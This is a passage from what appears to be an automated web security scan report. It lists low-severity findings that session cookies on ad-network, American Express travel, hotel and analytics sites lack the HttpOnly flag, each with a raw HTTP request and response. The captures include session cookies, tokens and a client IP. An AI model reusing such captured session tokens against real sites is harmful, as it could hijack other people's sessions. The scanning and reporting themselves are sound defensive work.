&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4248078B31C79B97218C3D4E49B5174D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 03 Oct 2011 01:53:15 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("eaa3bCBGoZRHY9Na_666924");

14.17. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=425A3F0D7D8F379F923F9D8944F00D2B; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:20 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...

14.18. http://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:09:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Path=/
Location: https://go.americanexpress-travel.com/hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8


14.19. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /SSOAuthenticateResponse.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SSOAuthenticateResponse.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://axptravel.americanexpress.com/consumertravel/customlogin.do?clientid=ACH-ONLINE&target=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do%3fService%3DAMEX%26leavingDate%3D10%2F04%2F11%26returningDate%3D10%2F07%2F11%26searchMode%3Dcity%26city%3DBoston%2C%2520United%2520States%26cityCountryCode%3D%26hotelName%3D%26adults%3D1%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25EF%25BF%25BDid%26WA4%3D%25EF%25BF%25BDid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot%26SSORequestPath%3D/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=90DF1362B8BE0812CA054723BD79F759.p0716; Path=/
Location: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


14.20. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelAvailability.do?SEQ=1317600834023922011 HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=14DD10D7D5064DF95146A9A1D7FADBBB.p0716; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Location: https://go.americanexpress-travel.com/hotel/HotelAvailability.do?SEQ=1317600834023922011
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


14.21. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...

14.22. http://hotelplanner.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hotelplanner.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD / HTTP/1.1
Host: hotelplanner.com
Proxy-Connection: keep-alive
Content-Length: 0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 01:40:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: CFID=60070682;expires=Wed, 25-Sep-2041 01:40:57 GMT;path=/
Set-Cookie: CFTOKEN=53f1015cf5671dc0-C770E694-A4BA-DBE0-02F461142B2FF8C1;expires=Wed, 25-Sep-2041 01:40:57 GMT;path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked


14.23. http://hublotnation.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hublotnation.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; path=/
X-Pingback: http://hublotnation.com/wp/xmlrpc.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 28115
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if IE 7 ]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]
...[SNIP]...

14.24. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb92
2585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=e1f36dbd085f0041d284; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=019dddd1; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93204194090; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.25. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
